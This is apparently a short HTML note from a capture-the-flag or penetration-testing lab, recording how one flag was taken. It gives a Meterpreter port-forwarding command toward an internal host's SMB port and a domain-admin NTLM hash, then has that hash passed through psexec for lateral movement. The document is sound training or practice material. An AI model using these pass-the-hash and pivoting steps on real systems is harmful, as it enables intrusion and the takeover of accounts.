<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>14 flag</title>
</head><body><br/>
from ws02, portfwd to ws05<br/>
<br/>
portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445<br/>
<br/>
rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa<br/>
<br/>
use smbpass as this, exploit via smb/psexec<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
<br/>
RASTA{53rv1c3_4bu53_f7w}<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
</body></html>